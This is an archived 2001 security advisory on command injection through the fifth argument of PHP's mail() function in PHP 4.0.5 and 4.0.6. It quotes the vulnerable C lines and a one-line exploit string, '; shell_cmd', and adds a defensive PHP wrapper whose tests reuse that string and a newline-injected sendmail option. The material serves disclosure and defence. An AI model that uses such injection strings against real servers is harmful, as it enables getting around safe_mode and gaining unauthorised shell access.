PHP's mail() function does not check the fifth argument for shell escape characters, even if PHP is running in safe_mode. So it may be possible to bypass the safe_mode restriction and gain shell access.

Affected: php4.0.6 php4.0.5

Significant lines of ext/standard/mail.c:

>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");

Exploit:

mail("totoat_private", "test", "test", "test", "; shell_cmd");
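The advisory's point is that whatever is passed as the fifth parameter is concatenated straight into a command line handed to popen(). The following is an added example (not from the advisory or from PHP itself) of how application code can protect itself: it assumes the only legitimate use of the extra parameter is sendmail's "-f" envelope-sender option, validates the value against a strict allow-list, and neutralises shell metacharacters with escapeshellcmd() as a second layer before calling mail(). The function names, the regular expression and the sample values are all constructed for this example.

```php
<?php
// Hardened wrapper around mail(): added example, not part of the original
// advisory. Assumes the fifth parameter is only ever used to set the
// envelope sender via sendmail's "-f" option; anything else is rejected.

function valid_envelope_sender($address)
{
    // Strict allow-list: one address made of safe characters only, no
    // whitespace, no quotes, no ';' '|' '&' '`' '$' etc. Deliberately
    // narrower than what RFC 5322 permits.
    return (bool) preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/', $address);
}

function safe_mail($to, $subject, $message, $headers, $envelope_from = null)
{
    if ($envelope_from === null) {
        // No extra command-line argument at all: nothing reaches popen()
        // beyond PHP's own sendmail_path.
        return mail($to, $subject, $message, $headers);
    }
    if (!valid_envelope_sender($envelope_from)) {
        trigger_error('safe_mail: rejected envelope sender', E_USER_WARNING);
        return false;
    }
    // Defence in depth: even after validation, escape shell metacharacters so
    // a future loosening of the pattern cannot turn into command injection.
    $extra = '-f' . escapeshellcmd($envelope_from);
    return mail($to, $subject, $message, $headers, $extra);
}

// Constructed demonstration values (not from the advisory). Only the
// validator is exercised here so that running this file sends no mail.
var_dump(valid_envelope_sender('bounces@example.com')); // true
var_dump(valid_envelope_sender('; shell_cmd'));        // false
var_dump(valid_envelope_sender("a@example.com\n-OQueueDirectory=/tmp")); // false
```

Rejecting rather than "cleaning" the value keeps the wrapper simple to reason about: if a value does not match the pattern, no part of it is ever placed on the sendmail command line, and a log entry (via the warning) gives operators a signal that someone tried.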
This archive was generated by hypermail 2b30 : Wed Jul 18 2001 - 08:55:10 PDT